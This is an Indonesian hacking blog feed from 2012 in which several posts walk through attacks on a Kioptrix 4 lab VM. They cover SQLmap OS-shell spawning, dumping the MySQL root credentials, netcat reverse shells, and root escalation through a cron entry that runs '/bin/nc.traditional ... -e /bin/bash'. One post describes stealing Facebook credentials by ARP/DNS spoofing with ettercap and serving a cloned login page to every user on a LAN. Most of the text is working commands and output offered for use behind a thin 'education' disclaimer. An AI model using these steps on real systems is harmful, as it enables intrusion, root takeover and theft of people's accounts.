Let's kicking ass!

Special Rooting [via SQLmap]

noreply@blogger.com (Double Dragon) — Fri, 11 May 2012 04:19:00 +0000

Root adalah user yang memiliki hak akses tertinggi dalam sistem operasi UNIX. Dalam system operasi Windows, root sama dengan NT AUTHORITY SYSTEM. Privilege escalating pada sistem operasi UNIX cukup mudah. User biasanya menggunakan perintah

Command :

user@unix:~$ suPassword: su: Authentication failureuser@unix:~$

Pada perintah su, user harus memasukan password milik root. Jika berhasil, maka user akan menjadi root dalam sistem tersebut. Kebanyakan mesin komputer yang memiliki OS UNIX, password root TIDAK diberikan secara cuma-cuma kepada user lain. Artinya password root hanya diketahui oleh segelintir orang. Hal ini bertujuan agar sistem tetap aman, tanpa user 'nakal' yang menggunakan hak akses root untuk mengubah system.

Mengangkat hak akses juga bisa dilakukan dengan perintah

Command :

user@unix:~$ iduid=2000(user) gid=2000(user) groups=2000(user)user@unix:~$ sudo suPassword: [sudo] password for www-data:root@unix:~# iduid=0(root) gid=0(root) groups=0(root)

Ini adalah sedikit contoh mengenai escalating privilege pada unix. Namun perusahaan yang cerdas, akan membatasi user untuk mengeksekusi perintah sudo su, agar user 'nakal' tidak menggunakan hak akses root untuk mengubah system.

Apa istimewanya root? Kali ini saya akan menjelaskan sedikit kemampuan khusus yang dimiliki oleh root. Yaitu menghapus data milik user lain.

Command :

www-data@red-dragon:/tmp$ echo "delete me if you can" > fuck_youwww-data@red-dragon:/tmp$ ls -l fuck_you -rw-r--r-- 1 www-data www-data 21 2012-05-11 10:09 fuck_youwww-data@red-dragon:/tmp$ cat fuck_you delete me if you can

User bernama www-data membuat sebuah file bernama fuck_you, yang berisi "delete me if you can". File ini terletak pada folder /tmp/.

Note : Tulisan yang berwarna kuning adalah hasil output dari perintah.

Kemudian datang user lain bernama couchdb. User ini sepertinya tidak suka dengan isi dan nama file yang dibuat oleh user www-data. Kemudian ia mencoba untuk menghapus file tersebut.

Command :

couchdb@red-dragon:/tmp$ ls -l fuck_you -rw-r--r-- 1 www-data www-data 21 2012-05-11 10:09 fuck_youcouchdb@red-dragon:/tmp$ rm fuck_yourm: remove write-protected regular file `fuck_you'? YESrm: cannot remove `fuck_you': Operation not permitted

Mengapa bisa seperti ini? Telah kita ketahui sebelumnya bahwa file ini milik user www-data, ketika user couchdb hendak menghapus file ini, maka system berkata:

"File ini milik www-data, kau tidak bisa menghapus file ini..."

Perhatikan ketika root hendak menghapus file ini

Command :

root@red-dragon:/tmp# ls -l fuck_you -rw-r--r-- 1 www-data www-data 21 2012-05-11 10:09 fuck_youroot@red-dragon:/tmp# rm fuck_youroot@red-dragon:/tmp# ls -l fuck_yourm: cannot remove `fuck_you': No such file or directory

File berhasil dihapus oleh root. Pada kasus web server, penggunaan hak akses ini yang membatasi peretas dalam melakukan mass deface. Karena peretas masuk ke dalam system dengan user A, dan tidak bisa mengganti file index milik user B-Z. Pada tahap seperti ini, peretas harus dapat mengangkat hak aksesnya menjadi root agar peretas dapat melancarkan serangan mass deface pada web server target.

Kali ini saya akan menjelaskan skema peretasan hak akses root hanya dengan menggunakan SQLmap! Saya melanjutkan peretasan pada KIOPTRIX 4, yang berjalan pada VMware saya. Percobaan peretasan KIOPTRIX 4 sudah saya jelaskan pada postingan saya sebelumnya.

Skill Requirements:

MYSQL command line
Spawn Shell With SQLmap

Tools Requirements:

SQLmap (dapat ditemukan pada backtrack 5)

Attacking Schema:

Attacker mengendalikan shell system milik korban
Mencari informasi mengenai password root database MySQL
Login database dengan akses root, dan membuat evil database
Meremote cron.d milik korban
GAME OVER

EULA

Tutorial ini di tulis dengan tujuan edukasi, penyalahgunaan skill yang terdapat dalam tutorial ini adalah tanggung jawab pembaca.

Walktrough

1. Spawn Bash With SQLmap

Untuk mengendalikan shell system milik korban, kita dapat menggunakan SQLmap. Pada tutorial sebelumnya, saya telah menjelaskan cara melakukan spawn bash dengan SQLmap.

Command :

<< back|track 5 R2 [~] sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&mypassword=admin&Submit=Login" --drop-set-cookie --os-shell

Setelah bash telah tereksekusi, kita akan menggunakan backdoor sederhana ini untuk melakukan rooting. Kali ini saya akan melakukan rooting melalui MYSQL yang berjalan pada system korban. Namun untuk mengakses database, saya harus dapat log in ke dalam database, dengan username dan password yang telah terdaftar pada database system. Pada posting sebelumnya mengenai Tricky Log In to MYSQL, kita telah mengetahui, bahwa root password bernilai blank. Artinya, kita dapat log in ke database dengan username root TANPA password.

Command :

os-shell> mysql -uroot -e "show databases;"do you want to retrieve the command standard output? [Y/n/a] command standard output:---Databaseinformation_schemamembersmysql---

Parameter -e akan mengeksekusi perintah SQL. Gunakan tanda petik dua untuk mengapit command MySQL, dan akhiri command mysql dengan titik koma. Setelah ini, kita buat database baru dengan nama exploit.

Command :

os-shell> mysql -uroot -e "create database exploit;"do you want to retrieve the command standard output? [Y/n/a] No outputos-shell> mysql -uroot -e "show databases;"do you want to retrieve the command standard output? [Y/n/a] command standard output:---Databaseinformation_schemaexploitmembersmysql---

Database exploit, telah berhasil dibuat. Selanjutnya kita buat tabel bernama rootme, dan kolom bernama stack dengan atribut text.

Note : Jika command mysql berhasil di eksekusi, maka tidak ada output yang tercipta (No Output).

Command :

os-shell> mysql -uroot -e "use exploit; create table rootme (stack text);"do you want to retrieve the command standard output? [Y/n/a] No outputos-shell> mysql -uroot -e "use exploit; show tables;"do you want to retrieve the command standard output? [Y/n/a] command standard output:---Tables_in_exploitrootme---

Selanjutnya kita input table ini dengan perintah cron.d. Ketahuilah rooting sebelumnya dengan burpsuite, dimana attacker menaruh perintah cron.d agar root mengeksekusi file tersebut, sehingga attacker mendapatkan shell dengan privilege root. Artikel dapat ditemukan di SQL Injection Level 4 Final [rooting]. Tabel ini kita masukan perintah cron.d seperti ini

Command :

* * * * * root /bin/nc.traditional 10.10.1.1 666 -e /bin/bash

Dimana 10.10.1.1 adalah IP saya (sesuaikan dengan IP address anda), dan 666 adalah port listener netcat saya. Kita input perintah ini ke dalam table rootme.

Command :

os-shell> mysql -uroot -e "use exploit; insert into rootme value ('* * * * * root /bin/nc.traditional 10.10.1.1 666 -e /bin/bash \r\n');"do you want to retrieve the command standard output? [Y/n/a] No outputos-shell> mysql -uroot -e "use exploit; select * from rootme;"do you want to retrieve the command standard output? [Y/n/a] command standard output:---stack* * * * * root /bin/nc.traditional 10.10.1.1 666 -e /bin/bash 
---

Kita jalankan netcat listener pada port 666 dari attacker.

Command :

<< back|track 5 R2 [~] nc -l -v -p 666

Setelah menunggu 2 menit, file cron.d tereksekusi, dan kita akan mendapatkan koneksi netcat dari korban dengan privilege root.

Command :

<< back|track 5 R2 [~] nc -l -v -p 666

listening on [any] 666 ...10.10.1.128: inverse host lookup failed: Unknown hostconnect to [10.10.1.1] from (UNKNOWN) [10.10.1.128] 49490iduid=0(root) gid=0(root) groups=0(root)

You are so....

pwned by : red-dragon

FMITM Hacking Account [Facebook]

noreply@blogger.com (Double Dragon) — Wed, 09 May 2012 07:48:00 +0000

Ada banyak sekali cara melakukan peretasan akun facebook. Cara yang sedang populer adalah menggunakan social engineering attack. Penggunaan social engineering sendiri, mengandalkan kecerobohan korban, agar korban masuk ke dalam jebakan peretas. Cara ini yang paling ampuh, karena tidak ada patch untuk kebodohan manusia. Kali ini saya tidak memberikan tutorial social engineering attack, karena saya tidak expert dalam masalah social engineering, melainkan dengan menggunakan metode saya sendiri. Saya menyebutnya dengan Fisher Man In The Middle.

Concept:

Konsepnya adalah menggabungkan MITM attack dengan fake login attack. Saya mengkloning halaman login facebook, kemudian memodifikasi script login dan menempatkannya pada localhost. Mengapa localhost? IP local lebih cocok dalam melakukan spoofing attack pada metode MITM. Selain itu, membuat domain lebih sulit dan repot ketimbang menggunakan mesin sendiri sebagai server. Setelah membuat halaman login, saya menjalankan metode MITM dengan ettercap, dan melakukan spoofing attack. Sehingga semua user dalam localhost, akan di-redirect menuju IP address saya, dimana IP address saya menuju ke port 80 dan fake login saya sudah siap melakukan tugasnya.

Kelebihan:

FMITM tidak membutuhkan file dan web hosting
Dalam prakteknya FMITM dapat menjaring lebih dari 3 user account dalam waktu kurang dari 10 menit.
Cara ini nyaris tidak dapat dihindari, karena metode MITM yang dipakai.

MITM [DNS Spoofing]

Victim -> Packet [Bring me to google] -> Access Point

Victim <- Packet [Google] <- Access Point

Diatas, menunjukan sesaat sebelum terjadinya spoofing attack yang dilakukan oleh attacker. Dimana korban mengirim paket berisi "bawa saya menuju google", paket ini dikirim kepada access point. Kemudian access point mendapat packet dari korban, sebagai respon, access point akan menghubungkan korban kepada google.

Victim -> Packet [Bring me to google] -> FMITM aka attacker [Modifying Packet] -> Packet [Bring me to IP attacker] -> Access Point

Victim <- Packet [IP attacker] <- FMITM aka attacker [Forwarding Packet] <- Packet [IP attacker] Access Point

Sementara alur diatas menjelaskan FMITM attack.

Korban mengirim paket kepada access point (AP), paket berisi "Tolong bawa saya ke google"
Attacker mengambil paket, dan memodifikasinya (inject packet with poison). Paket diubah menjadi "Bawa saya ke IP attacker".
Paket yang telah dimodifikasi oleh Attacker dikirim ke AP.
AP menerima paket, sebagai respon AP mengirim pake balasan dengan isi "IP attacker"
Packet tersebut kembali di-intercept oleh attacker, kali ini attacker tidak memodifikasi paket. Melainkan hanya meneruskan packet tersebut kepada korban.
Korban menerima paket, dan menuju ke IP attacker

Attacker telah menjalankan service HTTPD, sehingga ketika korban menuju IP address attacker, korban akan melihat halaman index milik attacker. Halaman index attacker telah diubah oleh attacker, sehingga halaman ini dapat melakukan aksi pishing.

Mengapa MITM?

Aksi MITM dapat membuat korban menuju fake login page, KEMANAPUN korban mencoba pergi. Dan metode ini tidak mengubah URL korban, sehingga tidak menimbulkan kecurigaan.

Mengapa Fake Login?

Fake login adalah paduan yang cocok dengan metode MITM, mengingat SET milik dave_rel1k masih menerima service cookie. Sehingga terjadi kecacatan dalam output hasil pancingan.

Preparation :

ettercap (dapat ditemukan pada backtrack)
apache (dapat ditemukan pada backtrack)
Fake login script (dapat di download di sini)

Note : password archive adalah "red-dragon" (tanpa tanda kutip)

EULA (End User License Agreement)

Tutorial ini ditulis dengan tujuan edukasi, panyalah gunaan skill yang terdapat dalam tutorial ini, adalah tanggung jawab pembaca.

Walktrough

1. Setting Up Ettercap

Ketahuilah IP address anda, ini hal paling dasar dalam melakukan FMITM. Anda juga harus memperhatikan lewat mana anda menyerang. MITM hanya berlaku pada localhost, jika anda menggunakan modem, anda tidak bisa melakukan hal ini lebih jauh. Jika anda menggunakan kabel LAN, maka anda menggunakan interface eth0. Jika anda menggunakan jaringan nirkabel (wifi), maka anda menggunakan interface wlan0. Untuk mengecek IP address, anda dapat menggunakan perintah:

Command :

<< back|track 5 R2 [~] ifconfig vmnet8 | grep "inet addr:" | awk -F ":" '{print $2}' | sed s/" Bcast"//g

Kali ini saya menggunakan Virtual OS untuk menguji keberhasilan metode saya. Hal ini bertujuan agar tidak ada pihak yang dirugikan selama pembuatan tutorial ini. Virtual OS saya menggunakan network adapter NAT, dimana Virtual OS saya dapat menggunakan internet JIKA backtrack saya memiliki akses internet. Saya menggunakan Windows XP Service Pack 2, berbahasa Inggris selama pengujian metode ini.

IP address saya adalah 10.10.2.1. Selanjutnya saya akan menaruh IP address ini pada config file dns spoof milik ettercap. Untuk dapat meng-input IP address ini, gunakan perintah

Command :

<< back|track 5 R2 [~] nano /usr/local/share/ettercap/etter.dns

Kemudian arahkan pointer keyboard pada akhir halaman, dan tambahkan:

Input :

* A [IP Address Anda]

Pengaturan seperti ini akan membuat korban dialihkan ke 10.10.2.1 KEMANAPUN korban pergi. Jika anda hanya ingin mengalihkan korban yang menuju youtube, maka.

Input :

*.youtube.com/* A [IP Address Anda]

Gunakan kemampuan bernalar anda sendiri dalam melakukan pengaturan file ettercap. Setelah selesai, tekan tombol ctrl+x kemudian tekan y, dan enter. File pengaturan anda berhasil tersimpan!

2. Mengatur fake login

Setelah mengunduh file dari link yang tersedia dalam persiapan di atas, copy semua file ke folder /var/www. Perlu diperhatikan. Anda harus mengubah ownership file ini menjadi milik www-data agar pishing dapat bekerja sebagaimana mestinya. Untuk mengecek ownership file, gunakan perintah

Command :

<< back|track 5 R2 [~] cd /var/www

Command :
<< back|track 5 R2 [/var/www] ls -l

Perhatikan, semua file ini milik root! Anda harus mengubah ownership file ini menjadi milik www-data dengan perintah

Command :

<< back|track 5 R2 [/var/www] chown www-data:www-data *

Kemudian cek kembali ownership file dengan perintah

Command :

<< back|track 5 R2 [/var/www] ls -l

Setelah file-file ini menjadi milik www-data. Maka selanjutnya kita akan menjalankan service apache, untuk menjalankan service apache, gunakan perintah:

Command :

<< back|track 5 R2 [/var/www] apache2ctl start

atau

Command :

<< back|track 5 R2 [/var/www] service apache2 start

atau

Command :

<< back|track 5 R2 [/var/www] /etc/ini.d/apache2 start

dan semua persiapanpun telah selesai.

3. FMITM in action

Sebelum memulai FMITM, saya akan membuktikan keberhasilan MITM dalam melakukan redirect ke IP address saya. Ini adalah screenshoot sebelum FMITM dilakukan:

Perhatikan command prompt. Perintah ping www.google.com menunjukan adanya balasan dari google, IP address ini milik google, dan ini wajar pada jaringan yang belum terserang MITM attack.

Kemudian saya jalankan perintah MITM dengan menggunakan etercap.

Command :

<< back|track 5 R2 [/var/www] ettercap -T -q -i vmnet8 -M ARP:REMOTE // // -P dns_spoof

Perhatikan kembali IP address anda, dan sesuaikan dengan perintah ettercap anda. Tanda // adalah target anda. // pertama menunjukan target 1, dan // kedua menunjukan target 2. Jika anda isi kosong, maka ettercap akan melancarkan serangan kepada semua IP address pada localhost, termasuk anda sendiri! Bagaimana jika anda hanya mengicar 1 orang?

Contoh:

Target 1 = 192.168.1.1 [Target 1 HARUS IP gate away]

Target 2 = 192.168.1.2

Maka perintah ettercap

Command :
<< back|track 5 R2 [/var/www] ettercap -T -q -i vmnet8 -M ARP:REMOTE /192.168.1.1/ /192.168.1.2/ -P dns_spoof

Bagaimana jika target 2 berjumlah lebih dari 1?

Contoh:

Target 1 = 192.168.1.1 [Target 1 HARUS IP gate away]

Target 2 = 192.168.1.2 dan 192.168.1.3

Command :
<< back|track 5 R2 [/var/www] ettercap -T -q -i vmnet8 -M ARP:REMOTE /192.168.1.1/ /192.168.1.2,3/ -P dns_spoof

Dan ini adalah screenshoot ketika MITM terjadi

Perhatikan kembali command prompt. Pada perintah ping www.google.com yang ke dua, IP balasan bukanlah seperti IP address pada perintah ping pertama sebelum terjadinya MITM. IP balasan justru 10.10.2.1, dimana IP tersebut, adalah IP milik saya. Perhatikan juga URL pada Mozilla. URL menunjukan www.google.com, namun halaman berubah menjadi index localhost milik attacker. Monitoring selalu file hasil.txt dengan perintah

Command :

<< back|track 5 R2 [~] tail -f /var/www/hasil.txt

Jika ada korban yang masuk, maka....

You are so.....

Pwned by : red-dragon

Tricky Log In to MySQL

noreply@blogger.com (Double Dragon) — Tue, 08 May 2012 04:05:00 +0000

Ada banyak cara untuk melakukan Log In MySQL. Kebanyakan dilakukan dengan Web Shell yang memiliki fitur koneksi ke database MySQL sebuah web server. Setidaknya anda melakukan beberapa tahapan sebelum anda sampai ke database server.

SQL Injection (Need Tools)
Log in site (Need Browser)
Upload Shell (Need Shell)
Find config.php or etc
Log In

Namun saya hanya membutuhkan SQLmap dan netcat untuk menembak database server. Satu hal yang terpenting, anda harus menggunakan kecerdasan anda sendiri ketika menghadapi sebuah masalah dalam melakukan penetrasi test. Anda tidak bisa mengandalkan satu teori untuk menyelesaikan banyak masalah. Dalam hal ini, saya menemukan banyak kesulitan.

Port MySQL difilter, sehingga saya tidak bisa langsung mengkoneksikan mesin saya ke database server dengan IP address saya (mungkin pengaturan iptables yang membatasi saya)
Tidak ada config.php pada document root, sehingga saya harus melakukan blind SQLi untuk memperoleh root password mysql.
Tidak ada fitur upload pada situs ini, sehingga saya tidak dapat melakukan upload shell untuk melakukan koneksi mysql.

Sadarilah, tidak ada yang mudah. Dan percayailah, bahwa yang sulit akan membawa anda pada teori baru yang membuat anda semakin berkualitas. ;)

Dalam turorial kali ini, saya masih menggunakan Virtual OS yang berjalan pada VMware dengan IP address 10.10.1.128. Tutorial ini masih berkaitan dengan Spawn Shell With SQLmap dan Back Connect With SQLmap. Jika anda belum membaca kedua tutorial di atas, alangkah baiknya jika anda memahami kedua konsep diatas sebelum anda melakukan tahap ini.

MySQL Connection

Attacker (IP attacker) -> (Username + Password) -> MySQL port (3306)

Jika autentikasi valid, maka attacker dapat mengakses database web server. Autentikasi sendiri dapat dibatasi dengan pengaturan dari MySQL sendiri, atau melakukan filtrasi dari IP luar untuk memblokir paket yang masuk ke port 3306. Dan logikanya, TIDAK ADA web server yang menolak koneksi localhost untuk melakukan log in ke dalam database. Ini mengapa kebanyakan peretas menggunakan webshell untuk mengkoneksikan mesinnya ke dalam database web server.

Attacker -> Web Shell (IP Local) -> (Username + Password) -> MySQL port (3306)

Pada kasus diatas, kemungkinan keberhasilan log in sangat tinggi, terlebih karena attacker menggunakan IP local milik web server, sehingga MySQL akan membaca paket login dengan IP 127.0.0.1. Paket ini tidak akan ditolak, karena berasal dari localhost. Dan permasalahannya adalah, mampukan attacker mendapatkan username + passwor? Tantangan yang sesungguhnya bukanlah mencari config.php, karena config.php hanya menyimpan username + password dari virtual user saja. Tantangan sesungguhnya justru datang dari, mampukah attacker mendapatkan root password MySQL?

EULA (End User License Agreement)

Tutorial ini ditulis dengan tujuan edukasi, penyalahgunaan skill yang berasal dari tutorial ini, adalah tanggung jawab penulis.

Preparation :

SQLmap (dapat ditemukan di backtrack)
netcat (dapat ditemukan di backtrack)

Walkthrough :

1. Dumping username + password root MySQL

Untuk melakukan hal ini, saya menggunakan SQLmap 1.0 versi developer pada revisi 5029. Kita tau bahwa mesin 10.10.1.128 memiliki kelemahan terhadap penyerangan SQL Inection pada halaman checklogin.php pada parameter mypassword (baca tutorial SQL Injection Level 4 Part 1). Setelah melalui tahap pengujian, ternyata kita mendapatkan database MySQL 5. Dan situs ini lemah terhadap penyerangan SQL Injection type boolean-based blind, dan AND/OR time-based blind. Karena ber-type blind, maka ini akan terasa seperti menunggu hujan emas. SQLmap akan berusaha mencari string yang tepat pada percobaan satu per satu dalam menemukan informasi yang diinginkan. Ini seperti meraba-raba kertas putih, menebaknya, kemudian jika tebakan anda benar maka karakter tebakan anda kan muncul. SQLmap akan menebak karakter per karakter. Ini adalah ciri khas dari SQL Injection type blind.

Command :

<< back|track 5 R2 [~] sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&mypassword=admin&Submit=Login" --drop-set-cookie --dbs

Perintah di atas bertujuan untuk melakukan ekstraksi daftar database yang ada pada web server. Dan hasilnya.

Sebagai informasi, username dan password root mysql selalu terletak pada database mysql. Maka kita harus menggunakan database ini untuk mencari table dan column yang tepat, dimana username dan passwor root mysql tersimpan.

Command :

<< back|track 5 R2 [~] sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&mypassword=admin&Submit=Login" --drop-set-cookie -D mysql --table

Kita berhasil mendapatkan table user di dalam database mysql. Selanjutnya kita akan menggunakan table ini untuk melakukan ekstraksi daftar kolom yang terdapat di dalam table user.

Command :

<< back|track 5 R2 [~] sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&mypassword=admin&Submit=Login" --drop-set-cookie -D mysql -T user --column

Kita berhasil mendapatkan kolom User dan Password. Langkah selanjutnya adalah mengekstraksi ke dua kolom ini, sehingga kita dapat memperoleh data di yang tersimpan di dalam ke dua kolom ini.

Command :

<< back|track 5 R2 [~] sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&mypassword=admin&Submit=Login" --drop-set-cookie -D mysql -T user --C User,Passwod --dump

Ternyata password mysql tidak diatur oleh web admin. Dalam beberapa kasus, mungkin anda akan menemukan password telah diatur, sehingga anda menemukan password yang terenkripsi. Anda harus melakukan decode hash ini sehingga anda mendapatkan clear text dari hash ini. Untuk melakukan decode hash, anda bisa menggunakan JTR (John The Ripper), atau findmyhash.py yang bisa anda temukan pada backtrack. Anda juga bisa melakukan decode hash dengan bantuan online pada situs-situs yang menyediakan jasa decode hash.

2. Log In database

Anda bisa langsung melakukan log in ke dalam database dari terminal, jadi anda tidak perlu menggunakan web shell untuk melakukan hal ini. Basic command dari koneksi mysql adalah

Command :

<< back|track 5 R2 [~] mysql -u (username) -h (host) -p (password)

Contoh dalam kasus saya

Command :

<< back|track 5 R2 [~] mysql -u root -h 10.10.1.128

Ada yang aneh. Saya tidak dapat log in ke dalam database. Mungkin ini menjadi alasan mengapa web admin tidak mengatur password root mysql, karena dia telah membatasi IP luar untuk melakukan log in ke dalam database web server. Karena IP saya dibatasi, maka saya akan menggunakan IP web server untuk melakukan koneksi ke dalam database. Bukan melalui proxy, namun melalui OS shell. Saya akan mengendalikan OS shell milik web server, sehingga saya akan dikenali sebagai user local oleh web server. Untuk mengendalikan OS shell, saya menggunakan bantuan netcat. Untuk melakukan hal ini, anda harus membaca turotial Back Connect With SQLmap.

Dari sini, saya akan melakukan log in ke dalam database web server.

Command :

www-data@Kioptrix4:/var/www$ mysql -u rootWelcome to the MySQL monitor. Commands end with ; or \g.Your MySQL connection id is 7243Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

Karena pasword root blank, maka saya tidak menambahkan parameter -p (untuk mengatur password saat melakukan log in).

Cheers. No hard feeling.

created by : red-dragon

Back Connect With SQLmap

noreply@blogger.com (Double Dragon) — Mon, 07 May 2012 09:31:00 +0000

Terinspirasi dari Spawn Shell With SQLmap, saya menemukan cara yang sedikit nyentrik. Yaitu melakukan back connect dengan shell yang tercipta pada SQL Injection yang dilakukan SQLmap.

Back Connect

Victim -> Port Listener -> Attacker

Back Connect memungkinkan attacker untuk mendapatkan shell korban. Ini seperti kasus bertelefon.

A -> Nomer Telepon -> B

Jika B adalah attacker, maka A akan berusaha menghubungi B dengan nomer telepon milik B. Perbedaannya dengan Back Connect, adalah back connect membutuhkan port tertentu untuk melakukan listening terhadap koneksi yang masuk. Contoh. Dalam sebuah kasus, Attacker mengeksploitasi korban dan memerintahkan korbah:

"Kau harus menghubungiku di IP address xxx.xxx.xxx.xxx pada port xxx"

Perintah ini akan dilakukan oleh korban yang terkena eksploitasi. Dalam hal ini, attacker telah menyediakan port masuk kepada korban. Pengaturan port sendiri tidak bisa sembarangan. Port yang digunakan untuk listening, tidak boleh port yang telah digunakan oleh service lain, seperti port 445 milik samba, port 21 milik ftp, port 22 milik ssh, atau port 80 milik apache. Gunakanlah port yang belum terpakai. Maka listener akan berjalan. Ketika proses listening telah berjalan, maka korban akan datang pada IP address yang telah ditentukan attacker, dan masuk lewat port yang disediakan attacker. Apa tidak berbahaya jika ada yang masuk ke dalam port kita? Tidak. Attacker telah mengatur prosedur sedemikian rupa, sehingga ketika terjadi hubungan, maka akan ada yang diekseksi. Contoh:

Victim [cmd.exe or /bin/bash] -> Port Listener -> Attacker

Ketika korban berhasil masuk ke port listener milik attacker, maka cmd.exe atau /bin/bash akan dieksekusi oleh korban sehingga attacker dapat mengatur command prompt [Windows] milik korban, atau mengatur bash [UNIX] milik korban.

Pada tutorial kali ini, saya masih menggunakan Virtual OS pada localhost untuk menghindari dampak buruk dari tutorial ini.

EULA (End User License Agreement)

Penulis membuat tutorial ini dengan tujuan edukasi, penyalah gunaan skill yang didapatkan dari tutorial ini, diluar tanggung jawab penulis.

Preparation

SQLmap (dapat ditemukan pada backtrack)
Netcat (dapat ditemukan pada backtrack)

Walkthorugh :

1. Memerintahkan korban untuk melakukan back connect

Ketahuilah, korban setidaknya harus memiliki netcat. Jika tidak, maka anda harus mengupload netcat pada korban. Anda bisa menggunakan netcat yang sudah dicompile, dan siap pakai, jadi anda tidak perlu melakukan installasi netcat yang membutuhkan privilege root. Netcat bisa anda download di sini.

Setidaknya anda harus dapat mengeksekusi sebuah perintah ke dalam mesin korban. Pada tutorial kali ini, saya akan menggunakan shell yang tercipta dari SQLmap. "Anda sudah mendapatkan shell, mengapa harus melakukan back connect?". Pertanyaan bagus, shell milik sqlmap tidaklah interactive, sehingga memiliki sejumlah keterbatasan dalam perintah-perintah yang interactive, seperti mengubah password, dan lain sebagainya.

Untuk mengeksekusi perintah netcat, anda hanya perlu memasukan perintah berikut.

Command :

os-shell> whereis ncdo you want to retrieve the command standard output? [Y/n/a] Ycommand standard output:    'nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz'

Command :

os-shell> /bin/nc.traditional 10.10.1.1 22 -e /bin/bash

Kebetulan virtual OS yang saya gunakan kali ini, sudah terpasang netcat, sehingga saya tidak perlu lagi mengupload netcat ke server.

Keterangan :

10.10.1.1 adalah IP address saya (attacker), sesuaikan dengan IP address anda, dan pastikan anda memiliki IP public, sehingga dapat dihubungi oleh korban.
22 adalah port listener yang saya gunakan, kebetulan saya tidak menjalankan service ssh. Jika service ssh berjalan, maka saya tidak dapat melakukan listening pada port ini.
-e /bin/bash adalah perintah yang tereksekusi ketika koneksi terjadi. Anda harus mengubah -e /bin/bash menjadi -e cmd.exe jika korban anda menggunakan operasi system windows.

2. Lakukan listening pada port yang anda tentukan

Sebelum perintah di atas dieksekusi, anda harus melakukan listening pada port yang telah anda tentukan sebelumnya. Hal ini bertujuan agar korban dapat menghubungi attacker dengan baik (berhasil). Jika port listening belum terbuka, dan perintah telah tereksekusi, maka akan terjadi kegagalan koneksi. Ini seperti melakukan sesi ftp pada server yang tidak menjalankan service ftp.

Untuk melakukan listening, anda hanya perlu memasukan perintah:

Command :

<< back|track 5 R2 [~] nc -lvp 22

Kemudian tekan enter, sehingga anda mendapatkan output seperti di bawah ini.

Command :

<< back|track 5 R2 [~] nc -lvp 22

listening on [any] 22 ...

Keterangan :

-l adalah opsi listening, attacker akan melakukan listening pada setiap koneksi yang masuk. Hal ini seperti stand by untuk dihubungi oleh korban.
-v adalah opsi verbose, opsi ini tidaklah begitu penting. Anda bisa meniadakan opsi ini ketika mengeksekusi perintah netcat.
-p adalah opsi port. Anda diharuskan menetapkan port listening. Anda tidak bisa membiarkan nilai -p kosong. Port bisa diatur pada rentang 1-65535, dengan syarat port tersebut tidak digunakan oleh service lain.

3. Game Over.

Ekseksusi kedua perintah pada tahap satu dan dua.

Kemudian

Command :

<< back|track 5 R2 [~] nc -lvp 22listening on [any] 22 ...
10.10.1.128: inverse host lookup failed: Unknown host
connect to [10.10.1.1] from (UNKNOWN) [10.10.1.128] 47195
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

It's easy, isn't it?

created by : red-dragon

Spawn Shell With SQLmap

noreply@blogger.com (Double Dragon) — Mon, 07 May 2012 08:36:00 +0000

Belakangan ini, tema post yang saya berikan selalu berbau SQL Injection. Saya harap pembaca tidak bosan membaca tutorial yang saya berikan. Kali ini saya akan menjelaskan bagaimana cara melakukan remote shell dengan metode SQL Injection. Dan pada kesempatan kali ini, saya akan menggunakan SQLmap.

Pada tutorial ini, pembaca mungkin akan menyadari apa yang membuat SQLmap lebih baik daripada alat SQL Injection yang lainnya. Karena tool ini benar-benar melakukan hal-hal yang sulit dijelaskan bagaimana cara kerjanya. Namun saya masih memahami sedikit dari metode yang digunakan SQLmap.

Metode Spawn Shell

Attacker -> SQLmap -> Upload [Shell Code] -> Victim

Alur di atas menjelaskan bahwa attacker menggunakan SQLmap untuk melakukan SQL injeksi, dan mengupload Shell Code pada korban. Hebatnya, anda tidak perlu malakukan log ini ke situs ini untuk mengupload shell code milik anda. Kemudian:

Attacker -> SQLmap -> Shell Code [Arbitrary Command] -> OS Shell

Sementara alur diatas menjelaskan bahwa attacker menggunakan SQLmap untuk menghubungkam dirinya ke backdoor yang telah ter-upload ke korban, dan mengirimkan perintah shell yang kemudian dieksekusi oleh OS Shell (Command Prompt pada Windows, atau Bash pada UNIX).

Shell Code atau backdoor yang dimiliki oleh SQLmap sendiri memiliki sejumlah jenis. Diantaranya ASP, ASPX, PHP, dan JSP. Jenis ini disesuaikan pada engine yang digunakan oleh korban. Pada tutorial kali ini, saya akan menggunakan jenis PHP. Saya tetap menggunakan Virtual OS pada localhost, agar tutorial saya tidak menimbulkan kerugian kepada pihak lain.

Preparation :

SQLmap (dapat ditemukan di backtrack)

EULA (End User License Agreement)

Tutorial ini memiliki tujuan edukasi, penyalahgunaan skill yang anda dapatkan dari tulisan ini, diluar tanggung jawab penulis.

Walkthorugh :

1. Ketahui celah SQL Injection pada korban

Pada tutorial sebelumnya, saya telah menjelaskan bagaimana cara menggunakan SQLmap lebih lanjut, jika tidak ditemukan parameter pada URL dengan bantuan tamper data. Jika anda belum memahaminya, saya sarankan anda membaca kembali postingan sebelumnya mengenai SQL Injection Level 4 [Part 1]

Untuk melakukan spawn shell, anda hanya perlu menambahkan parameter --os-shell pada perintah sqlmap.

Command :

<< back|track 5 R2 [~] sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&mypassword=admin&Submit=Login" --drop-set-cookie --ignore-proxy --os-shell

Opsi --os-shell ini bertujuan untuk mengupload arbitrary file ke korban, dan membuka shell baru.

2. Ketahui Engine yang digunakan oleh korban

Kebanyakan SQL injection, menyerang situs yang memiliki basic PHP, dengan database MySQL. Namun tidak berarti selalu PHP yang memiliki kelemahan. Bahawa pemrograman web seperti ASP, ASPX, dan JSP juga dapat melakukan koneksi ke database MySQL. Artinya bahasa pemrograman ini juga memiliki kelemahan (nothing is perfect). Setelah mengeksekusi perintah pada tahap satu, maka anda diharuskan untuk menentukan bahasa pemrograman web apa yang digunakan oleh korban.

Output :

